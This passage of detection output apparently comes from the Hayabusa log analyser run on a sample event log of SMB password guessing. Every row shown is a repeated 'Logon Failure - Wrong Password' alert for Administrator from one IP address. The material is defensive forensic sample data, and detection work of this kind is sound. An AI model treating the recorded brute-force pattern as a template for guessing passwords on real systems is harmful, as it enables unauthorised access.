NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jdPMREVdBEJ50ELC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.626 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p7YwRYYCnsr2v08C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.677 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nWyAzzpmxUm2CXE9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9RNqhxyUBjUIic0n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1JERyz3mOBZt2jki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V0i93RW5AOsIKKMU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.875 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U3XEu06vE68O900O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.925 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0fxeGE2jXOnoJttj | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:56.969 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Wdg3l6IFHTdh09j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.028 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4XLVQRnkUd3bfgvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rHjqFQwqpCJFI6qP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.139 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L5pEWq2mYsFpFLbb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HSFKJXTC2wlyw0gu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.225 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vh5igCJpAA5rmqzV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5NzLlJWkfXDcm64c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i9sR1QHgZ4oaa82F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pq1GWcKzSHSP28hk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: agCtM0s62zXPop0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.430 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dVvglj7RtxrBUeXi | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pMbS0sIpbFDqJvMW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ldO0cAZ54BRHHDyz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.577 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OmJH2QWFPiYarKh5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5fCiyHtI0OTo8pBO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e3vkVuU43tsYHUSj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.714 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3w21sFOu2u7FTDZM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.756 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bk7eaqQNK1CEgqoj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rv5joLgkm3QUYPyb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4l15usDM7jggwEyw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.887 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p9QpOvgDmiOgzQqb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dqyr8tb9TrO1aJNe | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:57.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hI1bzjixP8eOdDbw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pMTAp20wXS3d1OCk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.078 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qrQGfxInmlgPqGtd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZcsMMQbsnUdyLJWi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8oRYZqBBsq9GyApI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.256 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0TAhib6p8fY5iOgI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.306 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FerGHj9abOe6ehZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.362 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kN4B4KLpXbyKZzGv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HJtoyRfP38T3KToO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rkI5hLApUWhGnKIs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZCPSO4JLjMur2Eow | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VHmrv2xFuq7TyIQN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8SqYq3msNfFh24lg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YE0a2Bypzc1MMdGn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ojgIg88VK6hB72PI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ehLrf2GoAhY3Rf7Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.752 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ccfgpjwpis15B4gY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vysSf3DsOxQf5fVd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IEp88cEeiNw4IQsm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5PXDJPzw0gPdlCiH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mwoe9IgWx2UZ7Iuu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3eW0nFDUwKFzoQIw | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:58.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q0i0p5QxJ4ykYYJt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.033 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VsxqWAnd6j2CdyB3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.090 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y5qdy80mtFWl199k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.121 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ce0d84uBK4t2sqR3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b4dZYZEW1VijjwHN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.225 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZmqGJWbeap5dv0gC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.266 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zaNUqChgVSbDkFQu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.319 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B4PDZ55it0V4QGnM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TQxXVB8Aj5gaw2f2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vzDeZtgSJoH74GYk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iNAFsZraFvw67WWR | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.533 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aVdnbyzWqk58rOW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WjUH2PopXCrrPzqi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ylmV2z3WjTWsTpyu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.654 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8qBKZTYRTKuEAgS8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JvekO4A5f6QK2ynZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.753 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LDUqydSeA1guOjIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o71TltsJDyOIuLQb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NXT3MSCes42dVCNn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FGXiWeT8Evr6G70M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V2RarzrnGgcLaseH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u3k7dXu9o1vMkhby | IP Addr: 192.168.198.149 | AuthPackage: 
